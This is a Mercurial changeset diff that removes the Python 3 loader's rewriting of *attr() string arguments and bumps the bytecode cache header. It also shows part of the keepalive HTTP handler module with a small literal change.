py3: stop normalizing 2nd argument of *attr() to unicode...
Gregory Szorc
r43373:c95b2f40 default
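For context: before this change, Mercurial's Python 3 module loader rewrote the second argument of the *attr() builtins (getattr, setattr, hasattr, and Mercurial's safehasattr) into a unicode literal at import time. That rewrite is removed below, because pycompat's attr wrappers now coerce the name themselves. A standalone toy sketch of what the removed _ensureunicode() rewrite did (simplified: this version prefixes every bare string literal, not just *attr() second arguments):

    import io
    import token
    import tokenize

    def add_u_prefix(source):
        # Rewrite bare string literals to unicode literals, keeping the
        # recorded token positions so untokenize() can reassemble them.
        out = []
        for t in tokenize.tokenize(io.BytesIO(source).readline):
            if t.type == token.STRING and t.string.startswith(("'", '"')):
                t = t._replace(string='u%s' % t.string)
            out.append(t)
        return tokenize.untokenize(out)

    print(add_u_prefix(b"getattr(obj, 'name')\n").decode('utf-8'))
    # getattr(obj, u'name')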
@@ -1,259 +1,208
1 1 # __init__.py - Startup and module loading logic for Mercurial.
2 2 #
3 3 # Copyright 2015 Gregory Szorc <gregory.szorc@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import sys
11 11
12 12 # Allow 'from mercurial import demandimport' to keep working.
13 13 import hgdemandimport
14 14
15 15 demandimport = hgdemandimport
16 16
17 17 __all__ = []
18 18
19 19 # On Python 3, we use a custom module loader that transforms source code between
20 20 # source file reading and compilation. This is done by registering a custom
21 21 # finder that changes the spec for Mercurial modules to use a custom loader.
22 22 if sys.version_info[0] >= 3:
23 23 import importlib
24 24 import importlib.abc
25 25 import io
26 26 import token
27 27 import tokenize
28 28
29 29 class hgpathentryfinder(importlib.abc.MetaPathFinder):
30 30 """A sys.meta_path finder that uses a custom module loader."""
31 31
32 32 def find_spec(self, fullname, path, target=None):
33 33 # Only handle Mercurial-related modules.
34 34 if not fullname.startswith(('mercurial.', 'hgext.')):
35 35 return None
36 36 # don't try to parse binary
37 37 if fullname.startswith('mercurial.cext.'):
38 38 return None
39 39 # third-party packages are expected to be dual-version clean
40 40 if fullname.startswith('mercurial.thirdparty'):
41 41 return None
42 42 # zstd is already dual-version clean, don't try and mangle it
43 43 if fullname.startswith('mercurial.zstd'):
44 44 return None
45 45 # rustext is built for the right python version,
46 46 # don't try and mangle it
47 47 if fullname.startswith('mercurial.rustext'):
48 48 return None
49 49 # pywatchman is already dual-version clean, don't try and mangle it
50 50 if fullname.startswith('hgext.fsmonitor.pywatchman'):
51 51 return None
52 52
53 53 # Try to find the module using other registered finders.
54 54 spec = None
55 55 for finder in sys.meta_path:
56 56 if finder == self:
57 57 continue
58 58
59 59 # Originally the API was a `find_module` method, but it was
60 60 # renamed to `find_spec` in python 3.4, with a new `target`
61 61 # argument.
62 62 find_spec_method = getattr(finder, 'find_spec', None)
63 63 if find_spec_method:
64 64 spec = find_spec_method(fullname, path, target=target)
65 65 else:
66 66 spec = finder.find_module(fullname)
67 67 if spec is not None:
68 68 spec = importlib.util.spec_from_loader(fullname, spec)
69 69 if spec:
70 70 break
71 71
72 72 # This is a Mercurial-related module but we couldn't find it
73 73 # using the previously-registered finders. This likely means
74 74 # the module doesn't exist.
75 75 if not spec:
76 76 return None
77 77
78 78 # TODO need to support loaders from alternate specs, like zip
79 79 # loaders.
80 80 loader = hgloader(spec.name, spec.origin)
81 81 # Can't use util.safehasattr here because that would require
82 82 # importing util, and we're in import code.
83 83 if hasattr(spec.loader, 'loader'): # hasattr-py3-only
84 84 # This is a nested loader (maybe a lazy loader?)
85 85 spec.loader.loader = loader
86 86 else:
87 87 spec.loader = loader
88 88 return spec
89 89
90 90 def replacetokens(tokens, fullname):
91 91 """Transform a stream of tokens from raw to Python 3.
92 92
93 93 It is called by the custom module loading machinery to rewrite
94 94 source/tokens between source decoding and compilation.
95 95
96 96 Returns a generator of possibly rewritten tokens.
97 97
98 98 The input token list may be mutated as part of processing. However,
99 99 its changes do not necessarily match the output token stream.
100 100
101 101 REMEMBER TO CHANGE ``BYTECODEHEADER`` WHEN CHANGING THIS FUNCTION
102 102 OR CACHED FILES WON'T GET INVALIDATED PROPERLY.
103 103 """
104 104 # The following utility functions access the tokens list and the index i
105 105 # of the ``for i, t in enumerate(tokens)`` loop below.
106 106 def _isop(j, *o):
107 107 """Assert that tokens[j] is an OP with one of the given values"""
108 108 try:
109 109 return tokens[j].type == token.OP and tokens[j].string in o
110 110 except IndexError:
111 111 return False
112 112
113 def _findargnofcall(n):
114 """Find arg n of a call expression (start at 0)
115
116 Returns the index of the first token of that argument, or None if
117 there are not that many arguments.
118
119 Assumes that token[i + 1] is '('.
120
121 """
122 nested = 0
123 for j in range(i + 2, len(tokens)):
124 if _isop(j, ')', ']', '}'):
125 # end of call, tuple, subscription or dict / set
126 nested -= 1
127 if nested < 0:
128 return None
129 elif n == 0:
130 # this is the starting position of arg
131 return j
132 elif _isop(j, '(', '[', '{'):
133 nested += 1
134 elif _isop(j, ',') and nested == 0:
135 n -= 1
136
137 return None
138
139 def _ensureunicode(j):
140 """Make sure the token at j is a unicode string
141
142 This rewrites a string token to include the unicode literal prefix
143 so the string transformer won't add the byte prefix.
144
145 Ignores tokens that are not strings. Assumes bounds checking has
146 already been done.
147
148 """
149 st = tokens[j]
150 if st.type == token.STRING and st.string.startswith(("'", '"')):
151 tokens[j] = st._replace(string='u%s' % st.string)
152
153 113 for i, t in enumerate(tokens):
154 114 # This looks like a function call.
155 115 if t.type == token.NAME and _isop(i + 1, '('):
156 116 fn = t.string
157 117
158 # *attr() builtins don't accept byte strings to 2nd argument.
159 if fn in (
160 'getattr',
161 'setattr',
162 'hasattr',
163 'safehasattr',
164 ) and not _isop(i - 1, '.'):
165 arg1idx = _findargnofcall(1)
166 if arg1idx is not None:
167 _ensureunicode(arg1idx)
168
169 118 # It changes iteritems/values to items/values as they are not
170 119 # present in Python 3 world.
171 elif fn in ('iteritems', 'itervalues') and not (
120 if fn in ('iteritems', 'itervalues') and not (
172 121 tokens[i - 1].type == token.NAME
173 122 and tokens[i - 1].string == 'def'
174 123 ):
175 124 yield t._replace(string=fn[4:])
176 125 continue
177 126
178 127 # Emit unmodified token.
179 128 yield t
180 129
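The iteritems/itervalues renaming above survives this commit; it is also why the Python 3 branch of pycompat.strkwargs() further down can call dic.iteritems(). A hedged standalone sketch of that surviving rewrite (simplified: the real code also requires the name to be followed by an opening parenthesis):

    import io
    import token
    import tokenize

    def drop_iter_prefix(source):
        # iteritems/itervalues -> items/values, except at `def` sites.
        toks = list(tokenize.tokenize(io.BytesIO(source).readline))
        out = []
        for i, t in enumerate(toks):
            if (t.type == token.NAME
                    and t.string in ('iteritems', 'itervalues')
                    and not (i > 0 and toks[i - 1].type == token.NAME
                             and toks[i - 1].string == 'def')):
                t = t._replace(string=t.string[4:])
            out.append(t)
        return tokenize.untokenize(out)

    print(drop_iter_prefix(b"for k, v in d.iteritems(): pass\n").decode())
    # for k, v in d.items(): pass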
181 130 # Header to add to bytecode files. This MUST be changed when
182 131 # ``replacetokens`` or any mechanism that changes semantics of module
183 132 # loading is changed. Otherwise cached bytecode may get loaded without
184 133 # the new transformation mechanisms applied.
185 BYTECODEHEADER = b'HG\x00\x13'
134 BYTECODEHEADER = b'HG\x00\x14'
186 135
187 136 class hgloader(importlib.machinery.SourceFileLoader):
188 137 """Custom module loader that transforms source code.
189 138
190 139 When the source code is converted to a code object, we transform
191 140 certain patterns to be Python 3 compatible. This allows us to write code
192 141 that is natively Python 2 and compatible with Python 3 without
193 142 making the code excessively ugly.
194 143
195 144 We do this by transforming the token stream between parse and compile.
196 145
197 146 Implementing transformations invalidates caching assumptions made
198 147 by the built-in importer. The built-in importer stores a header on
199 148 saved bytecode files indicating the Python/bytecode version. If the
200 149 version changes, the cached bytecode is ignored. The Mercurial
201 150 transformations could change at any time. This means we need to check
202 151 that cached bytecode was generated with the current transformation
203 152 code or there could be a mismatch between cached bytecode and what
204 153 would be generated from this class.
205 154
206 155 We supplement the bytecode caching layer by wrapping ``get_data``
207 156 and ``set_data``. These functions are called when the
208 157 ``SourceFileLoader`` retrieves and saves bytecode cache files,
209 158 respectively. We simply add an additional header on the file. As
210 159 long as the version in this file is changed when semantics change,
211 160 cached bytecode should be invalidated when transformations change.
212 161
213 162 The added header has the form ``HG<VERSION>``. That is a literal
214 163 ``HG`` with 2 binary bytes indicating the transformation version.
215 164 """
216 165
217 166 def get_data(self, path):
218 167 data = super(hgloader, self).get_data(path)
219 168
220 169 if not path.endswith(tuple(importlib.machinery.BYTECODE_SUFFIXES)):
221 170 return data
222 171
223 172 # There should be a header indicating the Mercurial transformation
224 173 # version. If it doesn't exist or doesn't match the current version,
225 174 # we raise an OSError because that is what
226 175 # ``SourceFileLoader.get_code()`` expects when loading bytecode
227 176 # paths to indicate the cached file is "bad."
228 177 if data[0:2] != b'HG':
229 178 raise OSError('no hg header')
230 179 if data[0:4] != BYTECODEHEADER:
231 180 raise OSError('hg header version mismatch')
232 181
233 182 return data[4:]
234 183
235 184 def set_data(self, path, data, *args, **kwargs):
236 185 if path.endswith(tuple(importlib.machinery.BYTECODE_SUFFIXES)):
237 186 data = BYTECODEHEADER + data
238 187
239 188 return super(hgloader, self).set_data(path, data, *args, **kwargs)
240 189
241 190 def source_to_code(self, data, path):
242 191 """Perform token transformation before compilation."""
243 192 buf = io.BytesIO(data)
244 193 tokens = tokenize.tokenize(buf.readline)
245 194 data = tokenize.untokenize(replacetokens(list(tokens), self.name))
246 195 # Python's built-in importer strips frames from exceptions raised
247 196 # for this code. Unfortunately, that mechanism isn't extensible
248 197 # and our frame will be blamed for the import failure. There
249 198 # are extremely hacky ways to do frame stripping. We haven't
250 199 # implemented them because they are very ugly.
251 200 return super(hgloader, self).source_to_code(data, path)
252 201
253 202 # We automagically register our custom importer as a side-effect of
254 203 # loading. This is necessary to ensure that any entry points are able
255 204 # to import mercurial.* modules without having to perform this
256 205 # registration themselves.
257 206 if not any(isinstance(x, hgpathentryfinder) for x in sys.meta_path):
258 207 # meta_path is used before any implicit finders and before sys.path.
259 208 sys.meta_path.insert(0, hgpathentryfinder())
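The registration pattern above — delegate find_spec() to the other meta-path finders, then substitute a transforming loader — generalizes. A minimal self-contained sketch in the same spirit (the demopkg name and the appended marker are ours, purely illustrative):

    import importlib.abc
    import importlib.machinery
    import sys

    class demoloader(importlib.machinery.SourceFileLoader):
        # Intercept source between reading and compilation, like hgloader.
        def source_to_code(self, data, path):
            data = data + b'\n_TRANSFORMED = True\n'
            return super(demoloader, self).source_to_code(data, path)

    class demofinder(importlib.abc.MetaPathFinder):
        # Delegate to the remaining finders, then swap in our loader --
        # the same flow as hgpathentryfinder.find_spec() above.
        def find_spec(self, fullname, path, target=None):
            if not fullname.startswith('demopkg.'):
                return None
            for finder in sys.meta_path:
                if finder is self:
                    continue
                find_spec = getattr(finder, 'find_spec', None)
                if find_spec is None:
                    continue
                spec = find_spec(fullname, path, target=target)
                if spec is not None and spec.origin:
                    spec.loader = demoloader(spec.name, spec.origin)
                    return spec
            return None

    if not any(isinstance(f, demofinder) for f in sys.meta_path):
        sys.meta_path.insert(0, demofinder())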
@@ -1,848 +1,848
1 1 # This library is free software; you can redistribute it and/or
2 2 # modify it under the terms of the GNU Lesser General Public
3 3 # License as published by the Free Software Foundation; either
4 4 # version 2.1 of the License, or (at your option) any later version.
5 5 #
6 6 # This library is distributed in the hope that it will be useful,
7 7 # but WITHOUT ANY WARRANTY; without even the implied warranty of
8 8 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
9 9 # Lesser General Public License for more details.
10 10 #
11 11 # You should have received a copy of the GNU Lesser General Public
12 12 # License along with this library; if not, see
13 13 # <http://www.gnu.org/licenses/>.
14 14
15 15 # This file is part of urlgrabber, a high-level cross-protocol url-grabber
16 16 # Copyright 2002-2004 Michael D. Stenner, Ryan Tomayko
17 17
18 18 # Modified by Benoit Boissinot:
19 19 # - fix for digest auth (inspired from urllib2.py @ Python v2.4)
20 20 # Modified by Dirkjan Ochtman:
21 21 # - import md5 function from a local util module
22 22 # Modified by Augie Fackler:
23 23 # - add safesend method and use it to prevent broken pipe errors
24 24 # on large POST requests
25 25
26 26 """An HTTP handler for urllib2 that supports HTTP 1.1 and keepalive.
27 27
28 28 >>> from mercurial import util; urlreq = util.urlreq
29 29 >>> from mercurial.keepalive import HTTPHandler
30 30 >>> keepalive_handler = HTTPHandler()
31 31 >>> opener = urlreq.buildopener(keepalive_handler)
32 32 >>> urlreq.installopener(opener)
33 33 >>>
34 34 >>> fo = urlreq.urlopen('http://www.python.org')
35 35
36 36 If a connection to a given host is requested, and all of the existing
37 37 connections are still in use, another connection will be opened. If
38 38 the handler tries to use an existing connection but it fails in some
39 39 way, it will be closed and removed from the pool.
40 40
41 41 To remove the handler, simply re-run build_opener with no arguments, and
42 42 install that opener.
43 43
44 44 You can explicitly close connections by using the close_connection()
45 45 method of the returned file-like object (described below) or you can
46 46 use the handler methods:
47 47
48 48 close_connection(host)
49 49 close_all()
50 50 open_connections()
51 51
52 52 NOTE: using the close_connection and close_all methods of the handler
53 53 should be done with care when using multiple threads.
54 54 * there is nothing that prevents another thread from creating new
55 55 connections immediately after connections are closed
56 56 * no checks are done to prevent in-use connections from being closed
57 57
58 58 >>> keepalive_handler.close_all()
59 59
60 60 EXTRA ATTRIBUTES AND METHODS
61 61
62 62 Upon a status of 200, the object returned has a few additional
63 63 attributes and methods, which should not be used if you want to
64 64 remain consistent with the normal urllib2-returned objects:
65 65
66 66 close_connection() - close the connection to the host
67 67 readlines() - you know, readlines()
68 68 status - the return status (e.g. 404)
69 69 reason - English translation of status (e.g. 'File not found')
70 70
71 71 If you want the best of both worlds, use this inside an
72 72 AttributeError-catching try:
73 73
74 74 >>> try: status = fo.status
75 75 >>> except AttributeError: status = None
76 76
77 77 Unfortunately, these are ONLY there if status == 200, so it's not
78 78 easy to distinguish between non-200 responses. The reason is that
79 79 urllib2 tries to do clever things with error codes 301, 302, 401,
80 80 and 407, and it wraps the object upon return.
81 81 """
82 82
83 83 # $Id: keepalive.py,v 1.14 2006/04/04 21:00:32 mstenner Exp $
84 84
85 85 from __future__ import absolute_import, print_function
86 86
87 87 import collections
88 88 import errno
89 89 import hashlib
90 90 import socket
91 91 import sys
92 92 import threading
93 93
94 94 from .i18n import _
95 95 from .pycompat import getattr
96 96 from . import (
97 97 node,
98 98 pycompat,
99 99 urllibcompat,
100 100 util,
101 101 )
102 102 from .utils import procutil
103 103
104 104 httplib = util.httplib
105 105 urlerr = util.urlerr
106 106 urlreq = util.urlreq
107 107
108 108 DEBUG = None
109 109
110 110
111 111 class ConnectionManager(object):
112 112 """
113 113 The connection manager must be able to:
114 114 * keep track of all existing
115 115 """
116 116
117 117 def __init__(self):
118 118 self._lock = threading.Lock()
119 119 self._hostmap = collections.defaultdict(list) # host -> [connection]
120 120 self._connmap = {} # map connections to host
121 121 self._readymap = {} # map connection to ready state
122 122
123 123 def add(self, host, connection, ready):
124 124 self._lock.acquire()
125 125 try:
126 126 self._hostmap[host].append(connection)
127 127 self._connmap[connection] = host
128 128 self._readymap[connection] = ready
129 129 finally:
130 130 self._lock.release()
131 131
132 132 def remove(self, connection):
133 133 self._lock.acquire()
134 134 try:
135 135 try:
136 136 host = self._connmap[connection]
137 137 except KeyError:
138 138 pass
139 139 else:
140 140 del self._connmap[connection]
141 141 del self._readymap[connection]
142 142 self._hostmap[host].remove(connection)
143 143 if not self._hostmap[host]:
144 144 del self._hostmap[host]
145 145 finally:
146 146 self._lock.release()
147 147
148 148 def set_ready(self, connection, ready):
149 149 try:
150 150 self._readymap[connection] = ready
151 151 except KeyError:
152 152 pass
153 153
154 154 def get_ready_conn(self, host):
155 155 conn = None
156 156 self._lock.acquire()
157 157 try:
158 158 for c in self._hostmap[host]:
159 159 if self._readymap[c]:
160 160 self._readymap[c] = False
161 161 conn = c
162 162 break
163 163 finally:
164 164 self._lock.release()
165 165 return conn
166 166
167 167 def get_all(self, host=None):
168 168 if host:
169 169 return list(self._hostmap[host])
170 170 else:
171 171 return dict(self._hostmap)
172 172
173 173
174 174 class KeepAliveHandler(object):
175 175 def __init__(self, timeout=None):
176 176 self._cm = ConnectionManager()
177 177 self._timeout = timeout
178 178 self.requestscount = 0
179 179 self.sentbytescount = 0
180 180
181 181 #### Connection Management
182 182 def open_connections(self):
183 183 """return a list of connected hosts and the number of connections
184 184 to each. [('foo.com:80', 2), ('bar.org', 1)]"""
185 185 return [(host, len(li)) for (host, li) in self._cm.get_all().items()]
186 186
187 187 def close_connection(self, host):
188 188 """close connection(s) to <host>
189 189 host is the host:port spec, as in 'www.cnn.com:8080' as passed in.
190 190 no error occurs if there is no connection to that host."""
191 191 for h in self._cm.get_all(host):
192 192 self._cm.remove(h)
193 193 h.close()
194 194
195 195 def close_all(self):
196 196 """close all open connections"""
197 197 for host, conns in self._cm.get_all().iteritems():
198 198 for h in conns:
199 199 self._cm.remove(h)
200 200 h.close()
201 201
202 202 def _request_closed(self, request, host, connection):
203 203 """tells us that this request is now closed and that the
204 204 connection is ready for another request"""
205 205 self._cm.set_ready(connection, True)
206 206
207 207 def _remove_connection(self, host, connection, close=0):
208 208 if close:
209 209 connection.close()
210 210 self._cm.remove(connection)
211 211
212 212 #### Transaction Execution
213 213 def http_open(self, req):
214 214 return self.do_open(HTTPConnection, req)
215 215
216 216 def do_open(self, http_class, req):
217 217 host = urllibcompat.gethost(req)
218 218 if not host:
219 219 raise urlerr.urlerror(b'no host given')
220 220
221 221 try:
222 222 h = self._cm.get_ready_conn(host)
223 223 while h:
224 224 r = self._reuse_connection(h, req, host)
225 225
226 226 # if this response is non-None, then it worked and we're
227 227 # done. Break out, skipping the else block.
228 228 if r:
229 229 break
230 230
231 231 # connection is bad - possibly closed by server
232 232 # discard it and ask for the next free connection
233 233 h.close()
234 234 self._cm.remove(h)
235 235 h = self._cm.get_ready_conn(host)
236 236 else:
237 237 # no (working) free connections were found. Create a new one.
238 238 h = http_class(host, timeout=self._timeout)
239 239 if DEBUG:
240 240 DEBUG.info(
241 241 b"creating new connection to %s (%d)", host, id(h)
242 242 )
243 243 self._cm.add(host, h, False)
244 244 self._start_transaction(h, req)
245 245 r = h.getresponse()
246 246 # The string form of BadStatusLine is the status line. Add some context
247 247 # to make the error message slightly more useful.
248 248 except httplib.BadStatusLine as err:
249 249 raise urlerr.urlerror(
250 250 _(b'bad HTTP status line: %s') % pycompat.sysbytes(err.line)
251 251 )
252 252 except (socket.error, httplib.HTTPException) as err:
253 253 raise urlerr.urlerror(err)
254 254
255 255 # If not a persistent connection, don't try to reuse it. Look
256 256 # for this using getattr() since vcr doesn't define this
257 257 # attribute, and in that case always close the connection.
258 if getattr(r, r'will_close', True):
258 if getattr(r, 'will_close', True):
259 259 self._cm.remove(h)
260 260
261 261 if DEBUG:
262 262 DEBUG.info(b"STATUS: %s, %s", r.status, r.reason)
263 263 r._handler = self
264 264 r._host = host
265 265 r._url = req.get_full_url()
266 266 r._connection = h
267 267 r.code = r.status
268 268 r.headers = r.msg
269 269 r.msg = r.reason
270 270
271 271 return r
272 272
273 273 def _reuse_connection(self, h, req, host):
274 274 """start the transaction with a re-used connection
275 275 return a response object (r) upon success or None on failure.
276 276 This does NOT close or remove bad connections in cases where
277 277 it returns. However, if an unexpected exception occurs, it
278 278 will close and remove the connection before re-raising.
279 279 """
280 280 try:
281 281 self._start_transaction(h, req)
282 282 r = h.getresponse()
283 283 # note: just because we got something back doesn't mean it
284 284 # worked. We'll check the version below, too.
285 285 except (socket.error, httplib.HTTPException):
286 286 r = None
287 287 except: # re-raises
288 288 # adding this block just in case we've missed
289 289 # something we will still raise the exception, but
290 290 # lets try and close the connection and remove it
291 291 # first. We previously got into a nasty loop
292 292 # where an exception was uncaught, and so the
293 293 # connection stayed open. On the next try, the
294 294 # same exception was raised, etc. The trade-off is
295 295 # that it's now possible this call will raise
296 296 # a DIFFERENT exception
297 297 if DEBUG:
298 298 DEBUG.error(
299 299 b"unexpected exception - closing " b"connection to %s (%d)",
300 300 host,
301 301 id(h),
302 302 )
303 303 self._cm.remove(h)
304 304 h.close()
305 305 raise
306 306
307 307 if r is None or r.version == 9:
308 308 # httplib falls back to assuming HTTP 0.9 if it gets a
309 309 # bad header back. This is most likely to happen if
310 310 # the socket has been closed by the server since we
311 311 # last used the connection.
312 312 if DEBUG:
313 313 DEBUG.info(
314 314 b"failed to re-use connection to %s (%d)", host, id(h)
315 315 )
316 316 r = None
317 317 else:
318 318 if DEBUG:
319 319 DEBUG.info(b"re-using connection to %s (%d)", host, id(h))
320 320
321 321 return r
322 322
323 323 def _start_transaction(self, h, req):
324 324 oldbytescount = getattr(h, 'sentbytescount', 0)
325 325
326 326 # What follows mostly reimplements HTTPConnection.request()
327 327 # except it adds self.parent.addheaders in the mix and sends headers
328 328 # in a deterministic order (to make testing easier).
329 329 headers = util.sortdict(self.parent.addheaders)
330 330 headers.update(sorted(req.headers.items()))
331 331 headers.update(sorted(req.unredirected_hdrs.items()))
332 332 headers = util.sortdict((n.lower(), v) for n, v in headers.items())
333 333 skipheaders = {}
334 334 for n in (r'host', r'accept-encoding'):
335 335 if n in headers:
336 336 skipheaders[r'skip_' + n.replace(r'-', r'_')] = 1
337 337 try:
338 338 if urllibcompat.hasdata(req):
339 339 data = urllibcompat.getdata(req)
340 340 h.putrequest(
341 341 req.get_method(),
342 342 urllibcompat.getselector(req),
343 343 **skipheaders
344 344 )
345 345 if r'content-type' not in headers:
346 346 h.putheader(
347 347 r'Content-type', r'application/x-www-form-urlencoded'
348 348 )
349 349 if r'content-length' not in headers:
350 350 h.putheader(r'Content-length', r'%d' % len(data))
351 351 else:
352 352 h.putrequest(
353 353 req.get_method(),
354 354 urllibcompat.getselector(req),
355 355 **skipheaders
356 356 )
357 357 except socket.error as err:
358 358 raise urlerr.urlerror(err)
359 359 for k, v in headers.items():
360 360 h.putheader(k, v)
361 361 h.endheaders()
362 362 if urllibcompat.hasdata(req):
363 363 h.send(data)
364 364
365 365 # This will fail to record events in case of I/O failure. That's OK.
366 366 self.requestscount += 1
367 367 self.sentbytescount += getattr(h, 'sentbytescount', 0) - oldbytescount
368 368
369 369 try:
370 370 self.parent.requestscount += 1
371 371 self.parent.sentbytescount += (
372 372 getattr(h, 'sentbytescount', 0) - oldbytescount
373 373 )
374 374 except AttributeError:
375 375 pass
376 376
377 377
378 378 class HTTPHandler(KeepAliveHandler, urlreq.httphandler):
379 379 pass
380 380
381 381
382 382 class HTTPResponse(httplib.HTTPResponse):
383 383 # we need to subclass HTTPResponse in order to
384 384 # 1) add readline(), readlines(), and readinto() methods
385 385 # 2) add close_connection() methods
386 386 # 3) add info() and geturl() methods
387 387
388 388 # in order to add readline(), read must be modified to deal with a
389 389 # buffer. example: readline must read a buffer and then spit back
390 390 # one line at a time. The only real alternative is to read one
391 391 # BYTE at a time (ick). Once something has been read, it can't be
392 392 # put back (ok, maybe it can, but that's even uglier than this),
393 393 # so if you THEN do a normal read, you must first take stuff from
394 394 # the buffer.
395 395
396 396 # the read method wraps the original to accommodate buffering,
397 397 # although read() never adds to the buffer.
398 398 # Both readline and readlines have been stolen with almost no
399 399 # modification from socket.py
400 400
401 401 def __init__(self, sock, debuglevel=0, strict=0, method=None):
402 402 extrakw = {}
403 403 if not pycompat.ispy3:
404 404 extrakw[r'strict'] = True
405 405 extrakw[r'buffering'] = True
406 406 httplib.HTTPResponse.__init__(
407 407 self, sock, debuglevel=debuglevel, method=method, **extrakw
408 408 )
409 409 self.fileno = sock.fileno
410 410 self.code = None
411 411 self.receivedbytescount = 0
412 412 self._rbuf = b''
413 413 self._rbufsize = 8096
414 414 self._handler = None # inserted by the handler later
415 415 self._host = None # (same)
416 416 self._url = None # (same)
417 417 self._connection = None # (same)
418 418
419 419 _raw_read = httplib.HTTPResponse.read
420 420 _raw_readinto = getattr(httplib.HTTPResponse, 'readinto', None)
421 421
422 422 # Python 2.7 has a single close() which closes the socket handle.
423 423 # This method was effectively renamed to _close_conn() in Python 3. But
424 424 # there is also a close(). _close_conn() is called by methods like
425 425 # read().
426 426
427 427 def close(self):
428 428 if self.fp:
429 429 self.fp.close()
430 430 self.fp = None
431 431 if self._handler:
432 432 self._handler._request_closed(
433 433 self, self._host, self._connection
434 434 )
435 435
436 436 def _close_conn(self):
437 437 self.close()
438 438
439 439 def close_connection(self):
440 440 self._handler._remove_connection(self._host, self._connection, close=1)
441 441 self.close()
442 442
443 443 def info(self):
444 444 return self.headers
445 445
446 446 def geturl(self):
447 447 return self._url
448 448
449 449 def read(self, amt=None):
450 450 # the _rbuf test is only in this first if for speed. It's not
451 451 # logically necessary
452 452 if self._rbuf and amt is not None:
453 453 L = len(self._rbuf)
454 454 if amt > L:
455 455 amt -= L
456 456 else:
457 457 s = self._rbuf[:amt]
458 458 self._rbuf = self._rbuf[amt:]
459 459 return s
460 460 # Careful! http.client.HTTPResponse.read() on Python 3 is
461 461 # implemented using readinto(), which can duplicate self._rbuf
462 462 # if it's not empty.
463 463 s = self._rbuf
464 464 self._rbuf = b''
465 465 data = self._raw_read(amt)
466 466
467 467 self.receivedbytescount += len(data)
468 468 try:
469 469 self._connection.receivedbytescount += len(data)
470 470 except AttributeError:
471 471 pass
472 472 try:
473 473 self._handler.parent.receivedbytescount += len(data)
474 474 except AttributeError:
475 475 pass
476 476
477 477 s += data
478 478 return s
479 479
480 480 # stolen from Python SVN #68532 to fix issue1088
481 481 def _read_chunked(self, amt):
482 482 chunk_left = self.chunk_left
483 483 parts = []
484 484
485 485 while True:
486 486 if chunk_left is None:
487 487 line = self.fp.readline()
488 488 i = line.find(b';')
489 489 if i >= 0:
490 490 line = line[:i] # strip chunk-extensions
491 491 try:
492 492 chunk_left = int(line, 16)
493 493 except ValueError:
494 494 # close the connection as protocol synchronization is
495 495 # probably lost
496 496 self.close()
497 497 raise httplib.IncompleteRead(b''.join(parts))
498 498 if chunk_left == 0:
499 499 break
500 500 if amt is None:
501 501 parts.append(self._safe_read(chunk_left))
502 502 elif amt < chunk_left:
503 503 parts.append(self._safe_read(amt))
504 504 self.chunk_left = chunk_left - amt
505 505 return b''.join(parts)
506 506 elif amt == chunk_left:
507 507 parts.append(self._safe_read(amt))
508 508 self._safe_read(2) # toss the CRLF at the end of the chunk
509 509 self.chunk_left = None
510 510 return b''.join(parts)
511 511 else:
512 512 parts.append(self._safe_read(chunk_left))
513 513 amt -= chunk_left
514 514
515 515 # we read the whole chunk, get another
516 516 self._safe_read(2) # toss the CRLF at the end of the chunk
517 517 chunk_left = None
518 518
519 519 # read and discard trailer up to the CRLF terminator
520 520 ### note: we shouldn't have any trailers!
521 521 while True:
522 522 line = self.fp.readline()
523 523 if not line:
524 524 # a vanishingly small number of sites EOF without
525 525 # sending the trailer
526 526 break
527 527 if line == b'\r\n':
528 528 break
529 529
530 530 # we read everything; close the "file"
531 531 self.close()
532 532
533 533 return b''.join(parts)
534 534
535 535 def readline(self):
536 536 # Fast path for a line is already available in read buffer.
537 537 i = self._rbuf.find(b'\n')
538 538 if i >= 0:
539 539 i += 1
540 540 line = self._rbuf[:i]
541 541 self._rbuf = self._rbuf[i:]
542 542 return line
543 543
544 544 # No newline in local buffer. Read until we find one.
545 545 chunks = [self._rbuf]
546 546 i = -1
547 547 readsize = self._rbufsize
548 548 while True:
549 549 new = self._raw_read(readsize)
550 550 if not new:
551 551 break
552 552
553 553 self.receivedbytescount += len(new)
554 554 self._connection.receivedbytescount += len(new)
555 555 try:
556 556 self._handler.parent.receivedbytescount += len(new)
557 557 except AttributeError:
558 558 pass
559 559
560 560 chunks.append(new)
561 561 i = new.find(b'\n')
562 562 if i >= 0:
563 563 break
564 564
565 565 # We either have exhausted the stream or have a newline in chunks[-1].
566 566
567 567 # EOF
568 568 if i == -1:
569 569 self._rbuf = b''
570 570 return b''.join(chunks)
571 571
572 572 i += 1
573 573 self._rbuf = chunks[-1][i:]
574 574 chunks[-1] = chunks[-1][:i]
575 575 return b''.join(chunks)
576 576
577 577 def readlines(self, sizehint=0):
578 578 total = 0
579 579 list = []
580 580 while True:
581 581 line = self.readline()
582 582 if not line:
583 583 break
584 584 list.append(line)
585 585 total += len(line)
586 586 if sizehint and total >= sizehint:
587 587 break
588 588 return list
589 589
590 590 def readinto(self, dest):
591 591 if self._raw_readinto is None:
592 592 res = self.read(len(dest))
593 593 if not res:
594 594 return 0
595 595 dest[0 : len(res)] = res
596 596 return len(res)
597 597 total = len(dest)
598 598 have = len(self._rbuf)
599 599 if have >= total:
600 600 dest[0:total] = self._rbuf[:total]
601 601 self._rbuf = self._rbuf[total:]
602 602 return total
603 603 mv = memoryview(dest)
604 604 got = self._raw_readinto(mv[have:total])
605 605
606 606 self.receivedbytescount += got
607 607 self._connection.receivedbytescount += got
608 608 try:
609 609 self._handler.receivedbytescount += got
610 610 except AttributeError:
611 611 pass
612 612
613 613 dest[0:have] = self._rbuf
614 614 got += len(self._rbuf)
615 615 self._rbuf = b''
616 616 return got
617 617
618 618
619 619 def safesend(self, str):
620 620 """Send `str' to the server.
621 621
622 622 Shamelessly ripped off from httplib to patch a bad behavior.
623 623 """
624 624 # _broken_pipe_resp is an attribute we set in this function
625 625 # if the socket is closed while we're sending data but
626 626 # the server sent us a response before hanging up.
627 627 # In that case, we want to pretend to send the rest of the
628 628 # outgoing data, and then let the user use getresponse()
629 629 # (which we wrap) to get this last response before
630 630 # opening a new socket.
631 631 if getattr(self, '_broken_pipe_resp', None) is not None:
632 632 return
633 633
634 634 if self.sock is None:
635 635 if self.auto_open:
636 636 self.connect()
637 637 else:
638 638 raise httplib.NotConnected
639 639
640 640 # send the data to the server. if we get a broken pipe, then close
